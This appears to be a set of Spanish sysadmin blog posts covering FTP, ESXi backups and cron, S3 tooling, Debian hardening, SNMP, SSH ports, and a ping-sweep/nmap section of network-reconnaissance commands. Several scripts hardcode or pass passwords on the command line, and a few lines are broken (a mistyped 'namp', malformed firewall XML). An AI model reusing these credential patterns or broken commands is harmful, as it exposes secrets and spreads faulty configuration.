Clickeamos en Add para agregar el usuario con el cual accederemos al FTP Server:

Timpeamos en nombre de usuario -> Check Names -> Ok:

Seleccionamos el usuario en la lista y damos permisos de modificacion, luego OK:

Boton derecho del mouse sobre CarpetaFTP -> Propiedades:

Vamos a la solapa Directory Security, seleccionamos Deny Access -> Add -> Agregamos la ip o el rango de IPs desde el cual permitiremos el acceso FTP:

Probamos la conexion desde otro windows con un cliente FTP:

No olvidemos destildar las conexiones anonimas:

Limitamos el limite de conexiones segun nuestras necesidades:

Habilitamos los logs:

Elegimos el modo de listado de archivos:

Script para descargar de un FTP

2011-12-16T05:48:00.001-08:00

#!/usr/bin/expect -f
spawn sftp usuario@servidorSFTP
expect "password:"
send "acaVaLaPass\n"
set timeout 60
expect "sftp>"
send "cd /ruta/del/ftp\n"
expect "sftp>"
send "lcd /ruta/local/de/mi/equipo\n"
expect "sftp>"
send "mget *.*\n"
expect "sftp>"
send "exit\n"

Tambien podriamos utilizar el ncftpget, como muestra el siguiente script:

#!/bin/bash
/usr/bin/ncftpget -u miUsuarioFTP -p miPassword ftp.mi-dominio.com.ar /home/ruta/server/local/ /ruta/servidor/ftp/remoto/*

Desencriptar con GPG en Linux

2011-12-16T05:34:00.000-08:00

Les dejo un simple script de ejemplo de como utilizar GPG para desencriptar los archivos que nos envia la gente de PagoFacil con los pagos:

#!/bin/sh
/usr/bin/gpg --no-tty --passphrase "Aca va una passphrase" --decrypt /ruta-FileOrigen/PF`date +%d%m%y`.pgp > /rutaFileDestino/PF`date +%d%m%y`.txt

Ejecutar backup de ESXi remoto con tarea programada en Windows

2011-12-15T06:35:00.000-08:00

Uso:

C:\> plink -ssh -pw nuestro_password usuario_poder@ipservidor_esxi
/ruta_archivo.sh/archivo.sh

Ejemplos:

C:\> plink -ssh -pw Pass root@192.168.1.101
/vmfs/volumes/datastore1/backup/ghettoVCB.sh

C:\> plink -ssh -pw Pass root@192.168.1.101
/vmfs/volumes/4e412912-b49b42f8-f118238ea7289cfa7e/script_bk/ghettoVCB.sh

Fuente: La Legion de Yoda´s Blog

Crontab ESXi 5

2011-12-14T16:09:00.000-08:00

Editamos el cron de root para automatizar el backup con el ghetto:

# vi /var/spool/cron/crontabs/root
#min hour day mon dow command
0 0 1 * * /vmfs/volumes/datastoreBkup/lamw-ghettoVCB-518cef7/ghettoVCB.sh -f /vmfs/volumes/datastore/lamw-ghettoVCB-518cef7/vms_to_backup > /vmfs/volumes/datastore/ghetto-bk-$(date +%Y-%m-%d).log

Matamos el cron:

# kill $(cat /var/run/crond.pid)

Lo volvemos a iniciar:

# busybox crond

Ahora bien si reiniciamos el server desaparece del cron, demos agregar la linea persistente agregandola en el rc.local:

# vi /etc/rc.local
/bin/kill $(cat /var/run/crond.pid)
/bin/echo "0 0 1 * * /vmfs/volumes/datastoreBkup/lamw-ghettoVCB-518cef7/ghettoVCB.sh -f /vmfs/volumes/datastoreBkup/lamw-ghettoVCB-518cef7/vms_to_backup > /vmfs/volumes/datastoreBkup/ghetto-bk-$(date +%Y-%m-%d).log" >> /var/spool/cron/crontabs/root
/bin/busybox crond

Fuente: VMware Communities

Como nunca me acuerdo donde está la ruta del cron de root en ESXi 5 me hice un propio script como el crontab de linux, les dejo el código:

#!/bin/sh
# Script Crontab por Morsa
if [ $# = 1 ]
then
if [ $1 = "-e" ]
then
vi /var/spool/cron/crontabs/root
else
if [ $1 = "-l" ]
then
cat /var/spool/cron/crontabs/root
else
echo "Error de comando, para obtener ayuda ejecute: crontab sin parámetros"
fi
fi
else
echo "crontab: opción errónea
crontab - crontab for ESXi by Morsa - Ver. 1.0

USO: crontab [ -l | -e ]
Parámetro Descripción
-e Edita el crontab
-l Lista contenido del crontab"

echo "
Visite www.redes-seguridad.com.ar, errores enviar a tirher@gmail.com"
fi

Backup de Configuración de ESXi 5

2011-12-13T14:56:00.000-08:00

Backupear la config del host:

C:\Documents and Settings\morsa>"C:\Program Files\VMware\VMware vSphere CLI\bi
n\vicfg-cfgbackup.pl" --save --server 192.168.1.100 --username root --password Pass_de_root Nombre_archivo.bak
Saving firmware configuration to nombre_archivo.bak

Restaurar la configuración:

C:\Documents and Settings\morsa>"C:\Program Files\VMware\VMware vSphere CLI\bi
n\vicfg-cfgbackup.pl" --load --server 192.168.1.100 --username root --password Pass_de_root Nombre_archivo.bak

Reiniciar luego del restore!

Se backupean los siguientes archivos:

etc/sfcb/repository/root/interop/cim_indicationsubscription.idx
etc/sfcb/repository/root/interop/cim_listenerdestinationcimxml.idx
etc/sfcb/repository/root/interop/cim_indicationhandlercimxml.idx
etc/sfcb/repository/root/interop/cim_indicationfilter.idx
etc/sysconfig/network
etc/shadow
etc/resolv.conf
etc/random-seed
etc/passwd
etc/ntp.drift
etc/ntp.conf
etc/inetd.conf
etc/hosts
etc/group
etc/dropbear/dropbear_rsa_host_key
etc/dropbear/dropbear_dss_host_key
etc/chkconfig.db
etc/vmware/vmware.lic
etc/vmware/ssl/rui.key
etc/vmware/ssl/rui.crt
etc/vmware/snmp.xml
etc/vmware/locker.conf
etc/vmware/license.cfg
etc/vmware/esx.conf
etc/vmware/hostd/vmInventory.xml
etc/vmware/hostd/vmAutoStart.xml
etc/vmware/hostd/pools.xml
etc/vmware/hostd/hostsvc.xml
etc/vmware/hostd/config.xml
etc/vmware/hostd/authorization.x

Agregar nuevo disco VMware ESXi 5

2011-12-12T19:14:00.001-08:00

AWS Management Console Amazon S3 en debian Squeeze

2011-12-07T10:59:00.000-08:00

Descargamos el AWS:

root@Debian:~# wget https://raw.github.com/timkay/aws/master/aws

Damos permisos de ejecucion:

root@Debian:~# chmod a+x aws

Ejecutamos:

root@Debian:~# ./aws
sanity-check: "/root/.awssecret": file is missing. (Format: AccessKeyID\nSeecretAccessKey\n)
sanity-check: This curl (v) does not support --retry (>= v7.12.3), so --retry is disabled
sanity-check: Problems accessing AWS. Is curl installed?

Nos dice que necesitamos Curl, lo instalamos:

root@Debian:~# apt-get install curl

Do you want to continue [Y/n]? Y

sanity-check: "/root/.awssecret": file is missing. (Format: AccessKeyID\nSeecretAccessKey\n)
sanity-check: Your system clock is 22 seconds behind.

Creamos un archivo donde pondremos el access y la secret:

root@Debian:~# vim /root/.awssecret
AIOCQODIYUFAYAOISE # Reemplazarlo por nuestro access
J3XliKAASDBZgOoq0wu21GQqhwHI4t71GwphaqW # Reemplazarlo por nuestra secret

Volvemos a ejecutarlo:

root@Debian:~# ./aws
sanity-check: "/root/.awssecret": file permissions are -rw-r--r--. Should be -rw-------

Debemos modificar los permisos del awssecret:

root@Debian:~# ls -l "/root/.awssecret"
-rw-r--r-- 1 root root 62 Dec 6 17:46 /root/.awssecret

root@Debian:~# chmod 600 /root/.awssecret

Listamos los Buckets:

root@Debian:~# ./aws ls
sanity-check: Your system clock is 22 seconds behind.
+-------------------+--------------------------+
| Name | CreationDate
+-------------------+--------------------------+
| Backet | 2011-12-06T15:35:34.00
+-------------------+--------------------------+

Listamos un bucket en particular, vemos que dentro tenemos un file prueba.txt:

root@Debian:~# ./aws ls Bucket
sanity-check: Your system clock is 7 seconds ahead.
+-------------------+--------+--------+---------+-------------+------------+---------
| Name | Prefix | Marker | MaxKeys | IsTruncated | Key | LastModified | Size | StorageClass |
+-------------------+--------+--------+---------+-------------+------------+---------
| Bucket | | | 1000 | false |
| | | | | | prueba.txt | 2011-12-07T17:08:54.000Z | 12 | STANDARD |
+-------------------+--------+--------+---------+-------------+------------+---------

Subimos un archivo:

root@Debian:~# ./aws put Bucket otro.txt

Listamos:

root@Debian:~# ./aws ls Bucket
sanity-check: Your system clock is 8 seconds ahead.
+-------------------+--------+--------+---------+-------------+------------+---------
| Name | Prefix | Marker | MaxKeys | IsTruncated | Key | LastModified | Size | StorageClass |
+-------------------+--------+--------+---------+-------------+------------+---------
| Bucket | | | 1000 | false | | | | |
| | | | | | otro.txt | 2011-12-07T18:27:49.000Z | 5 | STANDARD |
| | | | | | prueba.txt | 2011-12-07T17:08:54.000Z | 12 | STANDARD |
+-------------------+--------+--------+---------+-------------+------------+---------

Descargamos un archivo:

root@Debian:~# ./aws get BackupRatingCorpo/\otro.txt nuevillo.txt
sanity-check: Your system clock is 8 seconds ahead.

Hardening Debian Squeeze

2011-12-02T15:18:00.001-08:00

Luego de una instalacion por defecto verificamos que servicios tenemos escuchando:

root@pdc:~# netstat -ano |grep LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:49216 0.0.0.0:* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
tcp6 0 0 ::1:25 :::* LISTEN off (0.00/0/0)
unix 2 [ ACC ] STREAM LISTENING 3564 /var/run/acpid.socket

Instalamos rcconf para bajar servicios que no utilizamos:

root@pdc:~# apt-get install rcconf

root@pdc:~# rcconf
Destildar todo menos ssh

root@pdc:~# reboot

Volvemos a verificar los servicios que escuchan luego de deshabilitar los que no son necesarios:

root@pdc:~# netstat -ano |grep LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)

Todavia SSH nos queda escuchando en todas las ips y en ipv6, lo cambiamos:

root@pdc:~# cp -pf /etc/ssh/sshd_config /etc/ssh/sshd_config.orig

root@pdc:~# vim /etc/ssh/sshd_config
Port 2222
ListenAddress 192.168.1.101
Protocol 2
PermitRootLogin no
PermitEmptyPasswords no

root@pdc:~# /etc/init.d/ssh restart

Volvemos a verificar que ahora no esta escuchando SSH en ipv6, fue cambiado el puerto y ademas restringida a una determinada ip:

root@pdc:~# netstat -ano |grep LISTEN
tcp 0 0 192.168.1.100:2222 0.0.0.0:* LISTEN off (0.00/0/0)

Ips desde donde permitimos acceso ssh:

root@pdc:~# vim /etc/hosts.allow
sshd : 192.168.1.0/255.255.255.0 : allow

root@pdc:~# vim /etc/hosts.deny
sshd : ALL : deny

root@pdc:~# netstat -ano |grep LISTEN
tcp 0 0 192.168.1.100:2222 0.0.0.0:* LISTEN off (0.00/0/0)

Eliminamos paquetes innecesarios como ser exim, dhcpclient:

root@pdc:~# apt-get remove --purge exim4-config exim4-base dhcp-client isc-dhcp-client isc-dhcp-common aptitude
eject setserial fdutils discover info nano telet makedev perl gcc libdiscover lighttpd sendmail

root@pdc:~# apt-get autoremove

Deshabilitar el reinicio con ctrl+alt+del:

Comentamos la linea en el inittab

root@pdc:~# vim /etc/inittab
#ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now

root@pdc:~# telinit q

Eliminamos la linea de la disquetera del fstab:

root@pdc:~# vim /etc/fstab
/dev/fd0 /media/floppy0 auto rw,user,noauto 0 0

Y si no usamos la lectora de cd:

/dev/scd0 /media/cdrom0 udf,iso9660 user,noauto 0 0

Deshabilitamos las shells para los usuarios que no lo necesitan:

root@pdc:~# vipw

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
games:x:5:60:games:/usr/games:/bin/false
man:x:6:12:man:/var/cache/man:/bin/false
lp:x:7:7:lp:/var/spool/lpd:/bin/false
mail:x:8:8:mail:/var/mail:/bin/false
news:x:9:9:news:/var/spool/news:/bin/false
uucp:x:10:10:uucp:/var/spool/uucp:/bin/false
proxy:x:13:13:proxy:/bin:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/false
list:x:38:38:Mailing List Manager:/var/list:/bin/false
irc:x:39:39:ircd:/var/run/ircd:/bin/false
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin

Eliminar bits suid y guid:

root@pdc:~# find / -path /proc -prune -o -type f -perm +6000 -ls
1646604 72 -rwsr-xr-x 1 root root 68316 Jan 25 16:19 /bin/mount
1646635 32 -rwsr-xr-x 1 root root 31360 Oct 14 2010 /bin/ping
1646602 48 -rwsr-xr-x 1 root root 47304 Jan 25 16:19 /bin/umount
1646686 32 -rwsr-xr-x 1 root root 29152 Feb 15 17:50 /bin/su
1646636 36 -rwsr-xr-x 1 root root 35252 Oct 14 2010 /bin/ping6
1741025 12 -rwxr-sr-x 1 root mail 10164 Feb 13 2010 /usr/bin/dotlockfile
1738793 36 -rwsr-xr-x 1 root root 34740 Feb 15 17:50 /usr/bin/passwd
1739777 32 -rwxr-sr-x 1 root crontab 30248 Dec 18 20:46 /usr/bin/crontab
1738792 56 -rwsr-xr-x 1 root root 50388 Feb 15 17:50 /usr/bin/gpasswd
1737577 28 -rwsr-xr-x 1 root root 25184 Feb 15 17:50 /usr/bin/newgrp
1739927 40 -rwsr-sr-x 1 daemon daemon 40704 Nov 30 2009 /usr/bin/at
1738796 36 -rwsr-xr-x 1 root root 36372 Feb 15 17:50 /usr/bin/chfn
1741800 80 -rwsr-sr-x 1 root mail 75896 Apr 26 2010 /usr/bin/procmail
1738797 28 -rwsr-xr-x 1 root root 27956 Feb 15 17:50 /usr/bin/chsh
1739731 8 -rwxr-sr-x 1 root tty 7784 Jun 17 2010 /usr/bin/bsd-write
1741801 16 -rwxr-sr-x 1 root mail 13172 Apr 26 2010 /usr/bin/lockfile
1741277 32 -rwxr-sr-x 1 root mlocate 30492 Nov 4 2009 /usr/bin/mlocate
1737470 12 -rwxr-sr-x 1 root tty 9944 Jan 25 16:19 /usr/bin/wall
1741309 8 -rwxr-sr-x 1 root mail 7768 Jan 14 12:08 /usr/bin/mutt_dotlock
1738795 56 -rwxr-sr-x 1 root shadow 49556 Feb 15 17:50 /usr/bin/chage
1738794 16 -rwxr-sr-x 1 root shadow 14840 Feb 15 17:50 /usr/bin/expiry
1741396 100 -rwxr-sr-x 1 root ssh 95564 Dec 26 15:12 /usr/bin/ssh-agent
1777703 196 -rwsr-xr-x 1 root root 194680 Dec 26 15:12 /usr/lib/openssh/ssh-keysign
1737861 12 -rwsr-xr-x 1 root root 9676 Jan 23 21:10 /usr/lib/pt_chown
1433660 28 -rwxr-sr-x 1 root shadow 27900 Oct 19 2010 /sbin/unix_chkpwd
1433707 84 -rwsr-xr-x 1 root root 80600 Aug 26 2010 /sbin/mount.nfs

root@pdc:~# chmod ug-s /usr/bin/wall /usr/bin/newgrp /usr/bin/chsh ............

Permitir su - solo a los usuarios que pertenezcan al grupo wheel:

root@pdc:~# addgroup --system wheel

root@pdc:~# usermod -G wheel usuario_para_elevar_a_root

root@pdc:~# vim /etc/pam.d/su
Descomentar:
auth required pam_wheel.so

Chequeo de seguridad:

root@pdc:~# apt-get install tiger

root@pdc:~# tiger

Fuente: http://www.arcert.gov.ar/ncursos/material/hardening-v2.pdf

Ping Sweep desde Linea de Comandos

2011-11-06T13:58:00.000-08:00

Tomando las ips de un determinado archivo (ips.txt):

C:\Users\Morsa\Desktop> for /f %i in (ips.txt) do ping -n 1 %i

Generando las ips desde la 1 a la 254 en el ultimo octeto:

C:\Users\Morsa\Desktop> for /L %i in (1,1,254) do ping 192.168.1.%i -n 1 > result.txt

En bash:

# for i in {1..255}; do ping 192.168.1.$i -c 1 ;done

Con nmap:

Pingueo a un equipo:

# nmap -sP 192.168.1.1

Pingueo todo un rango de red:

# namp -sP 192.168.1.0/24
# nmap -sP 192.168.1.0-254

SNMP windows 2008

2011-11-06T08:04:00.000-08:00

Inicio - Herramientas administrativas - Administrador del servidor

Características - Agregar Característica

Servicios - Servicio SNMP - Siguiente

Instalar

Cerrar

Reiniciamos el Servicio

Habilitar SNMP en ESXi 5

2011-11-01T15:31:00.000-07:00

Descargamos el VMware-vSphere-CLI-5.0.0-422456.exe de: aqui

Para ver el menu de ayuda:

C:\Program Files\VMware\VMware vSphere CLI\bin>vicfg-snmp.pl --help

Cambiamos la comunity:

C:\Program Files\VMware\VMware vSphere CLI\bin>vicfg-snmp.pl --server 192.168.1.100 --username root --password PasswordDelEsxi -c miComunidad

Habilitar el agente:

C:\Program Files\VMware\VMware vSphere CLI\bin>vicfg-snmp.pl --server 192.168.1.100 --username root --password PasswordDelEsxi -E

Deshabilitar el agente:

C:\Program Files\VMware\VMware vSphere CLI\bin>vicfg-snmp.pl --server 192.168.1.100 --username root --password PasswordDelEsxi -D

Ahora lo habilitamos en el Firewall mediante el vSphere, hacemos click en la solapa Configuration:

Luego en Security Profile:

En la sección de Firewall hacemos click sobre Properties

Seleccionamos en la lista dynamicruleset y luego clickeamos en el botón Firewall

Elegimos la ip/ips ó redes desde donde permitiremos las consultas SNMP y luego damos Ok en las ventanas restantes.

Cambiar Port SSH en ESXi 5

2011-10-28T19:46:00.000-07:00

Editamos el archivo y cambiamos el port por defecto (22) por el que deseamos, en mi caso por el 3333:

# vi /etc/ssh/sshd_config
Port 3333

Reiniciamos los agentes:

# services.sh restart

Configuramos el firewall:

# vi /vmfs/volumes/datastore
<ConfigRoot>
<service id='0000'>
<id>sshMorsa</id>
<rule id='0000'>
<direction>inbound</direction>
<protocol>tcp</protocol>
<dst< /porttype>
<port>3333</port>
</rule>
<enabled>true</enabled>
<required>false</required>
</service>
</ConfigRoot>

Creamos el script para después del booteo editando el /etc/rc.local y agregamos las siguientes líneas:

# vi /etc/rc.local
#Creamos el script:
cp /vmfs/volumes/datastore/sshMorsa.xml /etc/vmware/firewall

# Actualizamos las reglas del firewall:
/sbin/esxcli network firewall refresh

Verificamos el vSphere Client:

FUENTES:
http://www.no-x.org/
http://communities.vmware.com